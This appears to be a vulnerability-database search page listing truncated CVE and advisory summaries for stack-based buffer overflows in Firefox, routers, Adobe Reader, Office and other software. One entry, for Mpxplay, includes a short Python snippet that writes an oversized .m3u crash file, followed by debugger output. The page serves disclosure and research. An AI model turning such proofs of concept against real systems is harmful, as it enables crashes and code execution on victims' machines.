8439 matches found
Stack overflow
The AnimationThread function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 uses an incorrect argument to the sscanf function, which might allow remote attackers to cause a denial of service (stack-based buffer overflow and application crash) or possibly have unspecified other impa...
CVE-2015-7176
Mozilla Firefox CVE-2015-7176 affects Firefox before 41.0 (ESR 38.x before 38.3). Root cause: AnimationThread uses an incorrect argument to sscanf, enabling a remote attacker to trigger a stack-based buffer overflow and crash, with possible other impact via unknown vectors. Public details describ...
CVE-2015-7176
The AnimationThread function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 uses an incorrect argument to the sscanf function, which might allow remote attackers to cause a denial of service (stack-based buffer overflow and application crash) or possibly have unspecified other impa...
CVE-2015-6949
Stack-based buffer overflow in the ASUS TM-AC1900 router allows remote attackers to execute arbitrary code via crafted HTTP header values...
CVE-2015-6946
CVE-2015-6946 (Borland AccuRev Reprise License Manager) involves multiple stack-based buffer overflows in the service where remote attackers can execute arbitrary code via the activate_doit (akey, actserver) or service_startup_doit (licfile) parameters. Connected advisories (ZDI) describe stack o...
CVE-2015-6946
Multiple stack-based buffer overflows in the Reprise License Manager service in Borland AccuRev allow remote attackers to execute arbitrary code via the (1) akey or (2) actserver parameter to the activate_doit function or (3) licfile parameter to the service_startup_doit functionality...
Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow
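Use the following Python code to generate an m3u file that triggers the vulnerability. The debugging environment is Win7; because ASLR is present, the real address has to be computed each time by adding the offset to the changed upper 4 digits of the address. This vulnerability is again a local overflow caused by a logic error, a missing length check; a malformed file can be crafted and the target lured into clicking it, after which arbitrary code is executed. junk = "A" * 66666; file = open("CRASH.m3u", 'w'); file.write(junk); file.close() After generating the file, open mmc and trigger the vulnerability; the program breaks: 0:009 t 20ec.26d0: Access violation - code c0000005 first chance First chance...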
CVE-2014-9208
Multiple stack-based buffer overflows in unspecified DLL files in Advantech WebAccess before 8.0.1 allow remote attackers to execute arbitrary code via unknown vectors...
Amazon Linux: Security Advisory (ALAS-2014-300)
The remote host is missing an update for the...
Amazon Linux: Security Advisory (ALAS-2012-144)
The remote host is missing an update for the...
Amazon Linux: Security Advisory (ALAS-2014-282)
The remote host is missing an update for the...
Yahoo! Messenger 11.5.0.228 Buffer Overflow
ADVISORY INFORMATION: Product: Yahoo! Messenger; Vendor URL: www.yahoo.com; Type: Stack-based Buffer Overflow CWE-121; Date found: 2014-05-02; Date published: 2015-09-03; CVSSv3 Score: 4,8 AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L; CVE: CVE-2014-7216. VERSIONS AFFECTED: Yahoo!...
HP LoadRunner < 12.50 Scenario File Local Code Execution
The version of HP LoadRunner installed on the remote host is prior to 12.50. It is, therefore, affected by a local code execution vulnerability due to an overflow condition that is triggered when handling scenario files (.lrs). A local attacker can exploit this, via a specially crafted scenario fil...
CVE-2015-1171
CVE-2015-1171 affects GSM SIM Utility (aka SIM Card Editor) 6.6. The flaw is a stack-based buffer overflow triggered by a long entry in a .sms file, enabling remote code execution. Public materials in the Connected documents include an in-depth exploit description and sample exploit code (e.g., E...
ZSNES 1.51 - Local Buffer Overflow
ZSNES 1.51 - Local Buffer Overflow Exploit Author: Juan Sacco - http://www.exploitpack.comp Tested on: GNU/Linux - Kali Linux 2.0 Description: ZSNES v1.51 and prior is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on...
Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow Exploit
Microsoft Office 2007 suffers from a stack-based buffer overflow vulnerability when handling a malformed document. Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1 The following access violation was observed in Microsoft Office 2007 Word document: e24.e28:...
IBM Tivoli Storage Manager FastBack 6.1.x < 6.1.12.1 Multiple Vulnerabilities
The version of IBM Tivoli Storage Manager FastBack running on the remote host is 6.1.x prior to 6.1.12.1. It is, therefore, affected by multiple stack-based buffer overflow conditions that can be exploited by a remote attacker, using specially crafted packets, to cause a denial of service or...
CVE-2015-0795
Multiple stack-based buffer overflows in the SafeShellExecute method in the NetIQExecObject.NetIQExec.1 ActiveX control in NetIQExec.dll in NetIQ Security Solutions for iSeries 8.1 allow remote attackers to execute arbitrary code via long arguments, aka ZDI-CAN-2699...
CVE-2015-0795
CVE-2015-0795 affects NetIQ Security Solutions for iSeries. The NetIQExecObject.NetIQExec.1 ActiveX control's SafeShellExecute method in NetIQExec.dll contains a stack-based buffer overflow when processing long parameters, enabling remote code execution in affected installations of version 8.1. T...
CVE-2015-5110
CVE-2015-5110 is a stack-based buffer overflow in Adobe Reader/Acrobat affecting 10.x before 10.1.15 and 11.x before 11.0.12, plus Acrobat/Reader DC Classic before 2015.006.30060 and DC Continuous before 2015.008.20082 on Windows and OS X. The root cause is a stack/boundary overflow in the affect...